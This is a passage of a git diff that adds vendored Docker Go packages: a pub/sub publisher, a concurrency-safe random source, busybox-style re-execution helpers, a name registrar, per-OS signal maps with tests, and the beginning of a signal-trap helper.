+type Publisher struct { + m sync.RWMutex + buffer int + timeout time.Duration + subscribers map[subscriber]topicFunc +} + +// Len returns the number of subscribers for the publisher +func (p *Publisher) Len() int { + p.m.RLock() + i := len(p.subscribers) + p.m.RUnlock() + return i +} + +// Subscribe adds a new subscriber to the publisher returning the channel. +func (p *Publisher) Subscribe() chan interface{} { + return p.SubscribeTopic(nil) +} + +// SubscribeTopic adds a new subscriber that filters messages sent by a topic. +func (p *Publisher) SubscribeTopic(topic topicFunc) chan interface{} { + ch := make(chan interface{}, p.buffer) + p.m.Lock() + p.subscribers[ch] = topic + p.m.Unlock() + return ch +} + +// Evict removes the specified subscriber from receiving any more messages. +func (p *Publisher) Evict(sub chan interface{}) { + p.m.Lock() + delete(p.subscribers, sub) + close(sub) + p.m.Unlock() +} + +// Publish sends the data in v to all subscribers currently registered with the publisher. +func (p *Publisher) Publish(v interface{}) { + p.m.RLock() + if len(p.subscribers) == 0 { + p.m.RUnlock() + return + } + + wg := wgPool.Get().(*sync.WaitGroup) + for sub, topic := range p.subscribers { + wg.Add(1) + go p.sendTopic(sub, topic, v, wg) + } + wg.Wait() + wgPool.Put(wg) + p.m.RUnlock() +} + +// Close closes the channels to all subscribers registered with the publisher. 
+func (p *Publisher) Close() { + p.m.Lock() + for sub := range p.subscribers { + delete(p.subscribers, sub) + close(sub) + } + p.m.Unlock() +} + +func (p *Publisher) sendTopic(sub subscriber, topic topicFunc, v interface{}, wg *sync.WaitGroup) { + defer wg.Done() + if topic != nil && !topic(v) { + return + } + + // send under a select as to not block if the receiver is unavailable + if p.timeout > 0 { + select { + case sub <- v: + case <-time.After(p.timeout): + } + return + } + + select { + case sub <- v: + default: + } +} diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go new file mode 100644 index 0000000000..d6b0a1d59a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher_test.go @@ -0,0 +1,142 @@ +package pubsub + +import ( + "fmt" + "testing" + "time" +) + +func TestSendToOneSub(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + c := p.Subscribe() + + p.Publish("hi") + + msg := <-c + if msg.(string) != "hi" { + t.Fatalf("expected message hi but received %v", msg) + } +} + +func TestSendToMultipleSubs(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + subs := []chan interface{}{} + subs = append(subs, p.Subscribe(), p.Subscribe(), p.Subscribe()) + + p.Publish("hi") + + for _, c := range subs { + msg := <-c + if msg.(string) != "hi" { + t.Fatalf("expected message hi but received %v", msg) + } + } +} + +func TestEvictOneSub(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + s1 := p.Subscribe() + s2 := p.Subscribe() + + p.Evict(s1) + p.Publish("hi") + if _, ok := <-s1; ok { + t.Fatal("expected s1 to not receive the published message") + } + + msg := <-s2 + if msg.(string) != "hi" { + t.Fatalf("expected message hi but received %v", msg) + } +} + +func TestClosePublisher(t *testing.T) { + p := NewPublisher(100*time.Millisecond, 10) + subs := []chan interface{}{} + subs = append(subs, p.Subscribe(), p.Subscribe(), 
p.Subscribe()) + p.Close() + + for _, c := range subs { + if _, ok := <-c; ok { + t.Fatal("expected all subscriber channels to be closed") + } + } +} + +const sampleText = "test" + +type testSubscriber struct { + dataCh chan interface{} + ch chan error +} + +func (s *testSubscriber) Wait() error { + return <-s.ch +} + +func newTestSubscriber(p *Publisher) *testSubscriber { + ts := &testSubscriber{ + dataCh: p.Subscribe(), + ch: make(chan error), + } + go func() { + for data := range ts.dataCh { + s, ok := data.(string) + if !ok { + ts.ch <- fmt.Errorf("Unexpected type %T", data) + break + } + if s != sampleText { + ts.ch <- fmt.Errorf("Unexpected text %s", s) + break + } + } + close(ts.ch) + }() + return ts +} + +// for testing with -race +func TestPubSubRace(t *testing.T) { + p := NewPublisher(0, 1024) + var subs [](*testSubscriber) + for j := 0; j < 50; j++ { + subs = append(subs, newTestSubscriber(p)) + } + for j := 0; j < 1000; j++ { + p.Publish(sampleText) + } + time.AfterFunc(1*time.Second, func() { + for _, s := range subs { + p.Evict(s.dataCh) + } + }) + for _, s := range subs { + s.Wait() + } +} + +func BenchmarkPubSub(b *testing.B) { + for i := 0; i < b.N; i++ { + b.StopTimer() + p := NewPublisher(0, 1024) + var subs [](*testSubscriber) + for j := 0; j < 50; j++ { + subs = append(subs, newTestSubscriber(p)) + } + b.StartTimer() + for j := 0; j < 1000; j++ { + p.Publish(sampleText) + } + time.AfterFunc(1*time.Second, func() { + for _, s := range subs { + p.Evict(s.dataCh) + } + }) + for _, s := range subs { + if err := s.Wait(); err != nil { + b.Fatal(err) + } + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/random/random.go b/vendor/github.com/docker/docker/pkg/random/random.go new file mode 100644 index 0000000000..70de4d1304 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/random/random.go @@ -0,0 +1,71 @@ +package random + +import ( + cryptorand "crypto/rand" + "io" + "math" + "math/big" + "math/rand" + "sync" + "time" +) + +// Rand 
is a global *rand.Rand instance, which initialized with NewSource() source. +var Rand = rand.New(NewSource()) + +// Reader is a global, shared instance of a pseudorandom bytes generator. +// It doesn't consume entropy. +var Reader io.Reader = &reader{rnd: Rand} + +// copypaste from standard math/rand +type lockedSource struct { + lk sync.Mutex + src rand.Source +} + +func (r *lockedSource) Int63() (n int64) { + r.lk.Lock() + n = r.src.Int63() + r.lk.Unlock() + return +} + +func (r *lockedSource) Seed(seed int64) { + r.lk.Lock() + r.src.Seed(seed) + r.lk.Unlock() +} + +// NewSource returns math/rand.Source safe for concurrent use and initialized +// with current unix-nano timestamp +func NewSource() rand.Source { + var seed int64 + if cryptoseed, err := cryptorand.Int(cryptorand.Reader, big.NewInt(math.MaxInt64)); err != nil { + // This should not happen, but worst-case fallback to time-based seed. + seed = time.Now().UnixNano() + } else { + seed = cryptoseed.Int64() + } + return &lockedSource{ + src: rand.NewSource(seed), + } +} + +type reader struct { + rnd *rand.Rand +} + +func (r *reader) Read(b []byte) (int, error) { + i := 0 + for { + val := r.rnd.Int63() + for val > 0 { + b[i] = byte(val) + i++ + if i == len(b) { + return i, nil + } + val >>= 8 + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/random/random_test.go b/vendor/github.com/docker/docker/pkg/random/random_test.go new file mode 100644 index 0000000000..cf405f78cb --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/random/random_test.go @@ -0,0 +1,22 @@ +package random + +import ( + "math/rand" + "sync" + "testing" +) + +// for go test -v -race +func TestConcurrency(t *testing.T) { + rnd := rand.New(NewSource()) + var wg sync.WaitGroup + + for i := 0; i < 10; i++ { + wg.Add(1) + go func() { + rnd.Int63() + wg.Done() + }() + } + wg.Wait() +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/README.md b/vendor/github.com/docker/docker/pkg/reexec/README.md new file mode 100644 index 
0000000000..45592ce85a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/README.md @@ -0,0 +1,5 @@ +## reexec + +The `reexec` package facilitates the busybox style reexec of the docker binary that we require because +of the forking limitations of using Go. Handlers can be registered with a name and the argv 0 of +the exec of the binary will be used to find and execute custom init paths. diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_linux.go b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go new file mode 100644 index 0000000000..34ae2a9dcd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_linux.go @@ -0,0 +1,28 @@ +// +build linux + +package reexec + +import ( + "os/exec" + "syscall" +) + +// Self returns the path to the current process's binary. +// Returns "/proc/self/exe". +func Self() string { + return "/proc/self/exe" +} + +// Command returns *exec.Cmd which has Path as current binary. Also it setting +// SysProcAttr.Pdeathsig to SIGTERM. +// This will use the in-memory version (/proc/self/exe) of the current binary, +// it is thus safe to delete or replace the on-disk binary (os.Args[0]). +func Command(args ...string) *exec.Cmd { + return &exec.Cmd{ + Path: Self(), + Args: args, + SysProcAttr: &syscall.SysProcAttr{ + Pdeathsig: syscall.SIGTERM, + }, + } +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unix.go b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go new file mode 100644 index 0000000000..778a720e3b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unix.go @@ -0,0 +1,23 @@ +// +build freebsd solaris darwin + +package reexec + +import ( + "os/exec" +) + +// Self returns the path to the current process's binary. +// Uses os.Args[0]. +func Self() string { + return naiveSelf() +} + +// Command returns *exec.Cmd which has Path as current binary. 
+// For example if current binary is "docker" at "/usr/bin/", then cmd.Path will +// be set to "/usr/bin/docker". +func Command(args ...string) *exec.Cmd { + return &exec.Cmd{ + Path: Self(), + Args: args, + } +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go new file mode 100644 index 0000000000..76edd82427 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_unsupported.go @@ -0,0 +1,12 @@ +// +build !linux,!windows,!freebsd,!solaris,!darwin + +package reexec + +import ( + "os/exec" +) + +// Command is unsupported on operating systems apart from Linux, Windows, Solaris and Darwin. +func Command(args ...string) *exec.Cmd { + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/command_windows.go b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go new file mode 100644 index 0000000000..ca871c4227 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/command_windows.go @@ -0,0 +1,23 @@ +// +build windows + +package reexec + +import ( + "os/exec" +) + +// Self returns the path to the current process's binary. +// Uses os.Args[0]. +func Self() string { + return naiveSelf() +} + +// Command returns *exec.Cmd which has Path as current binary. +// For example if current binary is "docker.exe" at "C:\", then cmd.Path will +// be set to "C:\docker.exe". 
+func Command(args ...string) *exec.Cmd { + return &exec.Cmd{ + Path: Self(), + Args: args, + } +} diff --git a/vendor/github.com/docker/docker/pkg/reexec/reexec.go b/vendor/github.com/docker/docker/pkg/reexec/reexec.go new file mode 100644 index 0000000000..c56671d919 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/reexec/reexec.go @@ -0,0 +1,47 @@ +package reexec + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" +) + +var registeredInitializers = make(map[string]func()) + +// Register adds an initialization func under the specified name +func Register(name string, initializer func()) { + if _, exists := registeredInitializers[name]; exists { + panic(fmt.Sprintf("reexec func already registered under name %q", name)) + } + + registeredInitializers[name] = initializer +} + +// Init is called as the first part of the exec process and returns true if an +// initialization function was called. +func Init() bool { + initializer, exists := registeredInitializers[os.Args[0]] + if exists { + initializer() + + return true + } + return false +} + +func naiveSelf() string { + name := os.Args[0] + if filepath.Base(name) == name { + if lp, err := exec.LookPath(name); err == nil { + return lp + } + } + // handle conversion of relative paths to absolute + if absName, err := filepath.Abs(name); err == nil { + return absName + } + // if we couldn't get absolute name, return original + // (NOTE: Go only errors on Abs() if os.Getwd fails) + return name +} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar.go b/vendor/github.com/docker/docker/pkg/registrar/registrar.go new file mode 100644 index 0000000000..1e75ee995b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/registrar/registrar.go @@ -0,0 +1,127 @@ +// Package registrar provides name registration. It reserves a name to a given key. 
+package registrar + +import ( + "errors" + "sync" +) + +var ( + // ErrNameReserved is an error which is returned when a name is requested to be reserved that already is reserved + ErrNameReserved = errors.New("name is reserved") + // ErrNameNotReserved is an error which is returned when trying to find a name that is not reserved + ErrNameNotReserved = errors.New("name is not reserved") + // ErrNoSuchKey is returned when trying to find the names for a key which is not known + ErrNoSuchKey = errors.New("provided key does not exist") +) + +// Registrar stores indexes a list of keys and their registered names as well as indexes names and the key that they are registered to +// Names must be unique. +// Registrar is safe for concurrent access. +type Registrar struct { + idx map[string][]string + names map[string]string + mu sync.Mutex +} + +// NewRegistrar creates a new Registrar with the an empty index +func NewRegistrar() *Registrar { + return &Registrar{ + idx: make(map[string][]string), + names: make(map[string]string), + } +} + +// Reserve registers a key to a name +// Reserve is idempotent +// Attempting to reserve a key to a name that already exists results in an `ErrNameReserved` +// A name reservation is globally unique +func (r *Registrar) Reserve(name, key string) error { + r.mu.Lock() + defer r.mu.Unlock() + + if k, exists := r.names[name]; exists { + if k != key { + return ErrNameReserved + } + return nil + } + + r.idx[key] = append(r.idx[key], name) + r.names[name] = key + return nil +} + +// Release releases the reserved name +// Once released, a name can be reserved again +func (r *Registrar) Release(name string) { + r.mu.Lock() + defer r.mu.Unlock() + + key, exists := r.names[name] + if !exists { + return + } + + for i, n := range r.idx[key] { + if n != name { + continue + } + r.idx[key] = append(r.idx[key][:i], r.idx[key][i+1:]...) 
+ break + } + + delete(r.names, name) + + if len(r.idx[key]) == 0 { + delete(r.idx, key) + } +} + +// Delete removes all reservations for the passed in key. +// All names reserved to this key are released. +func (r *Registrar) Delete(key string) { + r.mu.Lock() + for _, name := range r.idx[key] { + delete(r.names, name) + } + delete(r.idx, key) + r.mu.Unlock() +} + +// GetNames lists all the reserved names for the given key +func (r *Registrar) GetNames(key string) ([]string, error) { + r.mu.Lock() + defer r.mu.Unlock() + + names, exists := r.idx[key] + if !exists { + return nil, ErrNoSuchKey + } + return names, nil +} + +// Get returns the key that the passed in name is reserved to +func (r *Registrar) Get(name string) (string, error) { + r.mu.Lock() + key, exists := r.names[name] + r.mu.Unlock() + + if !exists { + return "", ErrNameNotReserved + } + return key, nil +} + +// GetAll returns all registered names +func (r *Registrar) GetAll() map[string][]string { + out := make(map[string][]string) + + r.mu.Lock() + // copy index into out + for id, names := range r.idx { + out[id] = names + } + r.mu.Unlock() + return out +} diff --git a/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go new file mode 100644 index 0000000000..0c1ef312ae --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/registrar/registrar_test.go @@ -0,0 +1,119 @@ +package registrar + +import ( + "reflect" + "testing" +) + +func TestReserve(t *testing.T) { + r := NewRegistrar() + + obj := "test1" + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } + + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } + + obj2 := "test2" + err := r.Reserve("test", obj2) + if err == nil { + t.Fatalf("expected error when reserving an already reserved name to another object") + } + if err != ErrNameReserved { + t.Fatal("expected `ErrNameReserved` error when attempting to reserve an already reserved name") + 
} +} + +func TestRelease(t *testing.T) { + r := NewRegistrar() + obj := "testing" + + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } + r.Release("test") + r.Release("test") // Ensure there is no panic here + + if err := r.Reserve("test", obj); err != nil { + t.Fatal(err) + } +} + +func TestGetNames(t *testing.T) { + r := NewRegistrar() + obj := "testing" + names := []string{"test1", "test2"} + + for _, name := range names { + if err := r.Reserve(name, obj); err != nil { + t.Fatal(err) + } + } + r.Reserve("test3", "other") + + names2, err := r.GetNames(obj) + if err != nil { + t.Fatal(err) + } + + if !reflect.DeepEqual(names, names2) { + t.Fatalf("Exepected: %v, Got: %v", names, names2) + } +} + +func TestDelete(t *testing.T) { + r := NewRegistrar() + obj := "testing" + names := []string{"test1", "test2"} + for _, name := range names { + if err := r.Reserve(name, obj); err != nil { + t.Fatal(err) + } + } + + r.Reserve("test3", "other") + r.Delete(obj) + + _, err := r.GetNames(obj) + if err == nil { + t.Fatal("expected error getting names for deleted key") + } + + if err != ErrNoSuchKey { + t.Fatal("expected `ErrNoSuchKey`") + } +} + +func TestGet(t *testing.T) { + r := NewRegistrar() + obj := "testing" + name := "test" + + _, err := r.Get(name) + if err == nil { + t.Fatal("expected error when key does not exist") + } + if err != ErrNameNotReserved { + t.Fatal(err) + } + + if err := r.Reserve(name, obj); err != nil { + t.Fatal(err) + } + + if _, err = r.Get(name); err != nil { + t.Fatal(err) + } + + r.Delete(obj) + _, err = r.Get(name) + if err == nil { + t.Fatal("expected error when key does not exist") + } + if err != ErrNameNotReserved { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/signal/README.md b/vendor/github.com/docker/docker/pkg/signal/README.md new file mode 100644 index 0000000000..2b237a5942 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/README.md @@ -0,0 +1 @@ +This package provides helper 
functions for dealing with signals across various operating systems \ No newline at end of file diff --git a/vendor/github.com/docker/docker/pkg/signal/signal.go b/vendor/github.com/docker/docker/pkg/signal/signal.go new file mode 100644 index 0000000000..68bb77cf58 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal.go @@ -0,0 +1,54 @@ +// Package signal provides helper functions for dealing with signals across +// various operating systems. +package signal + +import ( + "fmt" + "os" + "os/signal" + "strconv" + "strings" + "syscall" +) + +// CatchAll catches all signals and relays them to the specified channel. +func CatchAll(sigc chan os.Signal) { + handledSigs := []os.Signal{} + for _, s := range SignalMap { + handledSigs = append(handledSigs, s) + } + signal.Notify(sigc, handledSigs...) +} + +// StopCatch stops catching the signals and closes the specified channel. +func StopCatch(sigc chan os.Signal) { + signal.Stop(sigc) + close(sigc) +} + +// ParseSignal translates a string to a valid syscall signal. +// It returns an error if the signal map doesn't include the given signal. 
+func ParseSignal(rawSignal string) (syscall.Signal, error) { + s, err := strconv.Atoi(rawSignal) + if err == nil { + if s == 0 { + return -1, fmt.Errorf("Invalid signal: %s", rawSignal) + } + return syscall.Signal(s), nil + } + signal, ok := SignalMap[strings.TrimPrefix(strings.ToUpper(rawSignal), "SIG")] + if !ok { + return -1, fmt.Errorf("Invalid signal: %s", rawSignal) + } + return signal, nil +} + +// ValidSignalForPlatform returns true if a signal is valid on the platform +func ValidSignalForPlatform(sig syscall.Signal) bool { + for _, v := range SignalMap { + if v == sig { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go new file mode 100644 index 0000000000..946de87e94 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_darwin.go @@ -0,0 +1,41 @@ +package signal + +import ( + "syscall" +) + +// SignalMap is a map of Darwin signals. +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUG": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CONT": syscall.SIGCONT, + "EMT": syscall.SIGEMT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INFO": syscall.SIGINFO, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "PIPE": syscall.SIGPIPE, + "PROF": syscall.SIGPROF, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go 
b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go new file mode 100644 index 0000000000..6b9569bb75 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_freebsd.go @@ -0,0 +1,43 @@ +package signal + +import ( + "syscall" +) + +// SignalMap is a map of FreeBSD signals. +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUF": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CONT": syscall.SIGCONT, + "EMT": syscall.SIGEMT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INFO": syscall.SIGINFO, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "LWP": syscall.SIGLWP, + "PIPE": syscall.SIGPIPE, + "PROF": syscall.SIGPROF, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "THR": syscall.SIGTHR, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_linux.go b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go new file mode 100644 index 0000000000..d418cbe9e3 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_linux.go @@ -0,0 +1,80 @@ +package signal + +import ( + "syscall" +) + +const ( + sigrtmin = 34 + sigrtmax = 64 +) + +// SignalMap is a map of Linux signals. 
const (
	// Linux real-time signal range; the kernel reserves the lowest RT
	// numbers for libc, so userspace SIGRTMIN is 34.
	sigrtmin = 34
	sigrtmax = 64
)

// SignalMap maps Linux signal names (without the "SIG" prefix) to their
// syscall values, including the POSIX real-time range expressed relative
// to SIGRTMIN/SIGRTMAX.
var SignalMap = map[string]syscall.Signal{
	// Standard signals.
	"ABRT":   syscall.SIGABRT,
	"ALRM":   syscall.SIGALRM,
	"BUS":    syscall.SIGBUS,
	"CHLD":   syscall.SIGCHLD,
	"CLD":    syscall.SIGCLD,
	"CONT":   syscall.SIGCONT,
	"FPE":    syscall.SIGFPE,
	"HUP":    syscall.SIGHUP,
	"ILL":    syscall.SIGILL,
	"INT":    syscall.SIGINT,
	"IO":     syscall.SIGIO,
	"IOT":    syscall.SIGIOT,
	"KILL":   syscall.SIGKILL,
	"PIPE":   syscall.SIGPIPE,
	"POLL":   syscall.SIGPOLL,
	"PROF":   syscall.SIGPROF,
	"PWR":    syscall.SIGPWR,
	"QUIT":   syscall.SIGQUIT,
	"SEGV":   syscall.SIGSEGV,
	"STKFLT": syscall.SIGSTKFLT,
	"STOP":   syscall.SIGSTOP,
	"SYS":    syscall.SIGSYS,
	"TERM":   syscall.SIGTERM,
	"TRAP":   syscall.SIGTRAP,
	"TSTP":   syscall.SIGTSTP,
	"TTIN":   syscall.SIGTTIN,
	"TTOU":   syscall.SIGTTOU,
	"UNUSED": syscall.SIGUNUSED,
	"URG":    syscall.SIGURG,
	"USR1":   syscall.SIGUSR1,
	"USR2":   syscall.SIGUSR2,
	"VTALRM": syscall.SIGVTALRM,
	"WINCH":  syscall.SIGWINCH,
	"XCPU":   syscall.SIGXCPU,
	"XFSZ":   syscall.SIGXFSZ,
	// Real-time signals, anchored at both ends of the range.
	"RTMIN":    sigrtmin,
	"RTMIN+1":  sigrtmin + 1,
	"RTMIN+2":  sigrtmin + 2,
	"RTMIN+3":  sigrtmin + 3,
	"RTMIN+4":  sigrtmin + 4,
	"RTMIN+5":  sigrtmin + 5,
	"RTMIN+6":  sigrtmin + 6,
	"RTMIN+7":  sigrtmin + 7,
	"RTMIN+8":  sigrtmin + 8,
	"RTMIN+9":  sigrtmin + 9,
	"RTMIN+10": sigrtmin + 10,
	"RTMIN+11": sigrtmin + 11,
	"RTMIN+12": sigrtmin + 12,
	"RTMIN+13": sigrtmin + 13,
	"RTMIN+14": sigrtmin + 14,
	"RTMIN+15": sigrtmin + 15,
	"RTMAX-14": sigrtmax - 14,
	"RTMAX-13": sigrtmax - 13,
	"RTMAX-12": sigrtmax - 12,
	"RTMAX-11": sigrtmax - 11,
	"RTMAX-10": sigrtmax - 10,
	"RTMAX-9":  sigrtmax - 9,
	"RTMAX-8":  sigrtmax - 8,
	"RTMAX-7":  sigrtmax - 7,
	"RTMAX-6":  sigrtmax - 6,
	"RTMAX-5":  sigrtmax - 5,
	"RTMAX-4":  sigrtmax - 4,
	"RTMAX-3":  sigrtmax - 3,
	"RTMAX-2":  sigrtmax - 2,
	"RTMAX-1":  sigrtmax - 1,
	"RTMAX":    sigrtmax,
}
0000000000..89576b9e3b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_solaris.go @@ -0,0 +1,42 @@ +package signal + +import ( + "syscall" +) + +// SignalMap is a map of Solaris signals. +// SIGINFO and SIGTHR not defined for Solaris +var SignalMap = map[string]syscall.Signal{ + "ABRT": syscall.SIGABRT, + "ALRM": syscall.SIGALRM, + "BUF": syscall.SIGBUS, + "CHLD": syscall.SIGCHLD, + "CONT": syscall.SIGCONT, + "EMT": syscall.SIGEMT, + "FPE": syscall.SIGFPE, + "HUP": syscall.SIGHUP, + "ILL": syscall.SIGILL, + "INT": syscall.SIGINT, + "IO": syscall.SIGIO, + "IOT": syscall.SIGIOT, + "KILL": syscall.SIGKILL, + "LWP": syscall.SIGLWP, + "PIPE": syscall.SIGPIPE, + "PROF": syscall.SIGPROF, + "QUIT": syscall.SIGQUIT, + "SEGV": syscall.SIGSEGV, + "STOP": syscall.SIGSTOP, + "SYS": syscall.SIGSYS, + "TERM": syscall.SIGTERM, + "TRAP": syscall.SIGTRAP, + "TSTP": syscall.SIGTSTP, + "TTIN": syscall.SIGTTIN, + "TTOU": syscall.SIGTTOU, + "URG": syscall.SIGURG, + "USR1": syscall.SIGUSR1, + "USR2": syscall.SIGUSR2, + "VTALRM": syscall.SIGVTALRM, + "WINCH": syscall.SIGWINCH, + "XCPU": syscall.SIGXCPU, + "XFSZ": syscall.SIGXFSZ, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unix.go b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go new file mode 100644 index 0000000000..5d058fd56b --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unix.go @@ -0,0 +1,21 @@ +// +build !windows + +package signal + +import ( + "syscall" +) + +// Signals used in cli/command (no windows equivalent, use +// invalid signals so they don't get handled) + +const ( + // SIGCHLD is a signal sent to a process when a child process terminates, is interrupted, or resumes after being interrupted. 
+ SIGCHLD = syscall.SIGCHLD + // SIGWINCH is a signal sent to a process when its controlling terminal changes its size + SIGWINCH = syscall.SIGWINCH + // SIGPIPE is a signal sent to a process when a pipe is written to before the other end is open for reading + SIGPIPE = syscall.SIGPIPE + // DefaultStopSignal is the syscall signal used to stop a container in unix systems. + DefaultStopSignal = "SIGTERM" +) diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go new file mode 100644 index 0000000000..c592d37dfe --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_unsupported.go @@ -0,0 +1,10 @@ +// +build !linux,!darwin,!freebsd,!windows,!solaris + +package signal + +import ( + "syscall" +) + +// SignalMap is an empty map of signals for unsupported platform. +var SignalMap = map[string]syscall.Signal{} diff --git a/vendor/github.com/docker/docker/pkg/signal/signal_windows.go b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go new file mode 100644 index 0000000000..440f2700e2 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/signal_windows.go @@ -0,0 +1,28 @@ +// +build windows + +package signal + +import ( + "syscall" +) + +// Signals used in cli/command (no windows equivalent, use +// invalid signals so they don't get handled) +const ( + SIGCHLD = syscall.Signal(0xff) + SIGWINCH = syscall.Signal(0xff) + SIGPIPE = syscall.Signal(0xff) + // DefaultStopSignal is the syscall signal used to stop a container in windows systems. + DefaultStopSignal = "15" +) + +// SignalMap is a map of "supported" signals. As per the comment in GOLang's +// ztypes_windows.go: "More invented values for signals". Windows doesn't +// really support signals in any way, shape or form that Unix does. +// +// We have these so that docker kill can be used to gracefully (TERM) and +// forcibly (KILL) terminate a container on Windows. 
+var SignalMap = map[string]syscall.Signal{ + "KILL": syscall.SIGKILL, + "TERM": syscall.SIGTERM, +} diff --git a/vendor/github.com/docker/docker/pkg/signal/trap.go b/vendor/github.com/docker/docker/pkg/signal/trap.go new file mode 100644 index 0000000000..638a1ab66c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/signal/trap.go @@ -0,0 +1,103 @@ +package signal + +import ( + "fmt" + "os" + gosignal "os/signal" + "path/filepath" + "runtime" + "strings" + "sync/atomic" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/pkg/errors" +) + +// Trap sets up a simplified signal "trap", appropriate for common +// behavior expected from a vanilla unix command-line tool in general +// (and the Docker engine in particular). +// +// * If SIGINT or SIGTERM are received, `cleanup` is called, then the process is terminated. +// * If SIGINT or SIGTERM are received 3 times before cleanup is complete, then cleanup is +// skipped and the process is terminated immediately (allows force quit of stuck daemon) +// * A SIGQUIT always causes an exit without cleanup, with a goroutine dump preceding exit. +// * Ignore SIGPIPE events. These are generated by systemd when journald is restarted while +// the docker daemon is not restarted and also running under systemd. +// Fixes https://github.com/docker/docker/issues/19728 +// +func Trap(cleanup func()) { + c := make(chan os.Signal, 1) + // we will handle INT, TERM, QUIT, SIGPIPE here + signals := []os.Signal{os.Interrupt, syscall.SIGTERM, syscall.SIGQUIT, syscall.SIGPIPE} + gosignal.Notify(c, signals...) 
